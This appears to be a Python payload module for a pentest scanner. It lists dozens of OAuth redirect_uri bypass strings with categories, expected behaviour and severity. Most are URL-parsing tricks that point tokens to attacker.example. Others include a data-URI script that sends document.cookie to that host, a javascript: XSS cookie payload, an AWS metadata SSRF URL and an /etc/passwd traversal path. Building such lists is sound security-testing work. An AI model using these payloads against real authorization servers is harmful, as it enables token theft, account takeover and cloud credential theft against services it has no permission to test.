"""oauth_redirect_bypass_payloads — handcrafted dev-time. Webapp module asset.

OAuth/OIDC redirect_uri bypass payloads for authorized pentest scanning.
Used by tools/webapp/oauth_redirect_bypass.py to detect weak redirect_uri
validation in OAuth authorization endpoints.
"""

OAUTH_REDIRECT_BYPASS_PAYLOADS = [
    # ── Wildcard subdomain confusion ────────────────────────────────────────
    {"payload": "https://attacker.victim.com/callback",
     "bypass_category": "wildcard_subdomain",
     "expected_behavior": "Accepts attacker-controlled subdomain when validator does substring match",
     "severity": "HIGH"},
    {"payload": "https://victim.com.attacker.example/callback",
     "bypass_category": "wildcard_subdomain",
     "expected_behavior": "Validator startswith() check passes, attacker domain receives token",
     "severity": "CRITICAL"},
    {"payload": "https://victimcom.attacker.example/callback",
     "bypass_category": "wildcard_subdomain",
     "expected_behavior": "Missing dot causes naive 'contains' check to pass",
     "severity": "HIGH"},
    {"payload": "https://victim-com.attacker.example/callback",
     "bypass_category": "wildcard_subdomain",
     "expected_behavior": "Hyphen substitution in domain naive-match bypass",
     "severity": "HIGH"},

    # ── Path traversal in redirect_uri ─────────────────────────────────────
    {"payload": "https://victim.com/callback/../@attacker.example/",
     "bypass_category": "path_traversal",
     "expected_behavior": "Path-component normalization differs between validator and browser",
     "severity": "HIGH"},
    {"payload": "https://victim.com/../../attacker.example",
     "bypass_category": "path_traversal",
     "expected_behavior": "URL parser strips ../ but validator sees the literal value",
     "severity": "MEDIUM"},
    {"payload": "https://victim.com#@attacker.example/",
     "bypass_category": "path_traversal",
     "expected_behavior": "Fragment treated as part of host by some parsers",
     "severity": "HIGH"},

    # ── Userinfo abuse ──────────────────────────────────────────────────────
    {"payload": "https://victim.com@attacker.example/",
     "bypass_category": "userinfo_abuse",
     "expected_behavior": "RFC 3986 userinfo — browsers redirect to attacker.example",
     "severity": "CRITICAL"},
    {"payload": "https://victim.com:80@attacker.example/callback",
     "bypass_category": "userinfo_abuse",
     "expected_behavior": "Port in userinfo confuses lazy validators",
     "severity": "HIGH"},
    {"payload": "https://victim.com\\@attacker.example/",
     "bypass_category": "userinfo_abuse",
     "expected_behavior": "Backslash treated as path-sep by browser, as userinfo by validator",
     "severity": "HIGH"},
    {"payload": "https://victim.com%40attacker.example/callback",
     "bypass_category": "userinfo_abuse",
     "expected_behavior": "URL-encoded @ — decoded by browser, missed by string-compare",
     "severity": "HIGH"},
    {"payload": "https://user@victim.com@attacker.example/cb",
     "bypass_category": "userinfo_abuse",
     "expected_behavior": "Multiple @ — RFC parser takes last, naive parser takes first",
     "severity": "HIGH"},

    # ── Fragment injection ──────────────────────────────────────────────────
    {"payload": "https://victim.com/callback#@attacker.example/",
     "bypass_category": "fragment_injection",
     "expected_behavior": "Fragment processed differently by validator vs browser",
     "severity": "HIGH"},
    {"payload": "https://attacker.example/path#https://victim.com",
     "bypass_category": "fragment_injection",
     "expected_behavior": "Reverse-anchor confusion in URL parsers",
     "severity": "MEDIUM"},

    # ── Double-encoding bypasses ────────────────────────────────────────────
    {"payload": "https://victim.com%252F..%252F@attacker.example",
     "bypass_category": "double_encoding",
     "expected_behavior": "Double URL-encode bypasses single-decode validators",
     "severity": "HIGH"},
    {"payload": "https://victim.com%25%34%30attacker.example",
     "bypass_category": "double_encoding",
     "expected_behavior": "Hex-encoded percent sign smuggles @ char",
     "severity": "HIGH"},

    # ── Scheme abuse ────────────────────────────────────────────────────────
    {"payload": "javascript:alert(document.cookie)//https://victim.com/cb",
     "bypass_category": "scheme_abuse",
     "expected_behavior": "JavaScript URI in OAuth redirect — XSS on authorization page",
     "severity": "CRITICAL"},
    {"payload": "data:text/html,<script>fetch(`https://attacker.example?t=${document.cookie}`)</script>",
     "bypass_category": "scheme_abuse",
     "expected_behavior": "Data URI smuggles code execution",
     "severity": "CRITICAL"},
    {"payload": "//attacker.example/callback",
     "bypass_category": "scheme_abuse",
     "expected_behavior": "Protocol-relative URL inherits attacker's scheme",
     "severity": "HIGH"},
    {"payload": "/\\attacker.example/callback",
     "bypass_category": "scheme_abuse",
     "expected_behavior": "Backslash-prefix path interpreted as host by browser",
     "severity": "HIGH"},

    # ── Open-redirect chaining ──────────────────────────────────────────────
    {"payload": "https://victim.com/redirect?url=https://attacker.example/",
     "bypass_category": "open_redirect_chain",
     "expected_behavior": "Approved domain redirects to attacker = token leak via Referer",
     "severity": "HIGH"},
    {"payload": "https://victim.com/login?next=https://attacker.example/",
     "bypass_category": "open_redirect_chain",
     "expected_behavior": "next= parameter abuse for post-auth redirect chain",
     "severity": "HIGH"},

    # ── Case + Unicode tricks ───────────────────────────────────────────────
    {"payload": "https://VICTIM.COM@attacker.example/callback",
     "bypass_category": "case_confusion",
     "expected_behavior": "Case-sensitive host comparison mismatch",
     "severity": "MEDIUM"},
    {"payload": "https://victïm.com/callback",
     "bypass_category": "unicode_idn",
     "expected_behavior": "Punycode (xn--vctm-eya.com) vs ASCII victim.com",
     "severity": "HIGH"},
    {"payload": "https://victim.com​.attacker.example/callback",
     "bypass_category": "unicode_idn",
     "expected_behavior": "Zero-width space breaks naive endswith() check",
     "severity": "HIGH"},
    {"payload": "https://xn--ttacker-jka.example/callback",
     "bypass_category": "unicode_idn",
     "expected_behavior": "IDN homograph attack on the attacker domain",
     "severity": "MEDIUM"},

    # ── Port + scheme confusion ─────────────────────────────────────────────
    {"payload": "https://victim.com:8080@attacker.example:443/",
     "bypass_category": "port_confusion",
     "expected_behavior": "Port in userinfo position bypasses regex anchors",
     "severity": "HIGH"},
    {"payload": "http://victim.com:443/callback",
     "bypass_category": "scheme_downgrade",
     "expected_behavior": "Forced HTTP on HTTPS port — MITM opportunity",
     "severity": "MEDIUM"},

    # ── PostMessage / postauth tricks ───────────────────────────────────────
    {"payload": "https://victim.com/oauth/cb?#access_token=ATTACKER_INJECTED",
     "bypass_category": "postmessage_abuse",
     "expected_behavior": "Hash-frag token smuggle to victim parent window",
     "severity": "HIGH"},
    {"payload": "https://victim.com/oauth/cb?code=ATTACKER_CODE",
     "bypass_category": "code_injection",
     "expected_behavior": "Forged code value (low impact if state validated)",
     "severity": "MEDIUM"},

    # ── State parameter abuse ───────────────────────────────────────────────
    {"payload": "https://victim.com/callback?state=https://attacker.example",
     "bypass_category": "state_open_redirect",
     "expected_behavior": "state= used as post-login redirect — open-redirect chain",
     "severity": "HIGH"},

    # ── Missing-validation paths ────────────────────────────────────────────
    {"payload": "",
     "bypass_category": "empty_redirect_uri",
     "expected_behavior": "Empty redirect_uri may fall back to insecure default",
     "severity": "MEDIUM"},
    {"payload": "*",
     "bypass_category": "wildcard_value",
     "expected_behavior": "Wildcard accepted = any redirect_uri valid",
     "severity": "CRITICAL"},
    {"payload": "null",
     "bypass_category": "null_value",
     "expected_behavior": "Validator skip on null value",
     "severity": "MEDIUM"},

    # ── Localhost + private IP abuse ────────────────────────────────────────
    {"payload": "http://localhost:1337/?token={leaked}",
     "bypass_category": "localhost_abuse",
     "expected_behavior": "Localhost redirect — attacker runs local listener",
     "severity": "MEDIUM"},
    {"payload": "http://127.0.0.1:1337/cb",
     "bypass_category": "localhost_abuse",
     "expected_behavior": "Loopback IP redirect",
     "severity": "MEDIUM"},
    {"payload": "http://0.0.0.0:1337/cb",
     "bypass_category": "localhost_abuse",
     "expected_behavior": "All-interfaces redirect bypass",
     "severity": "MEDIUM"},
    {"payload": "http://169.254.169.254/latest/meta-data/",
     "bypass_category": "ssrf_cloud_meta",
     "expected_behavior": "AWS IMDS — cloud metadata theft if server-side redirect",
     "severity": "CRITICAL"},

    # ── More edge cases ─────────────────────────────────────────────────────
    {"payload": "https://victim.com/oauth/callback?next=//attacker.example",
     "bypass_category": "double_redirect_chain",
     "expected_behavior": "OAuth approves victim.com which then redirects to attacker",
     "severity": "HIGH"},
    {"payload": "https://victim.com%00.attacker.example/cb",
     "bypass_category": "null_byte_injection",
     "expected_behavior": "Null byte truncates string compare but not URL parse",
     "severity": "HIGH"},
    {"payload": "https://[email protected]@attacker.example/",
     "bypass_category": "userinfo_abuse",
     "expected_behavior": "Email-style userinfo confuses validators",
     "severity": "HIGH"},
    {"payload": "https://victim.com/callback/../../../../../../../etc/passwd",
     "bypass_category": "lfi_chain",
     "expected_behavior": "If redirect saved to disk, LFI chain possible",
     "severity": "MEDIUM"},
]
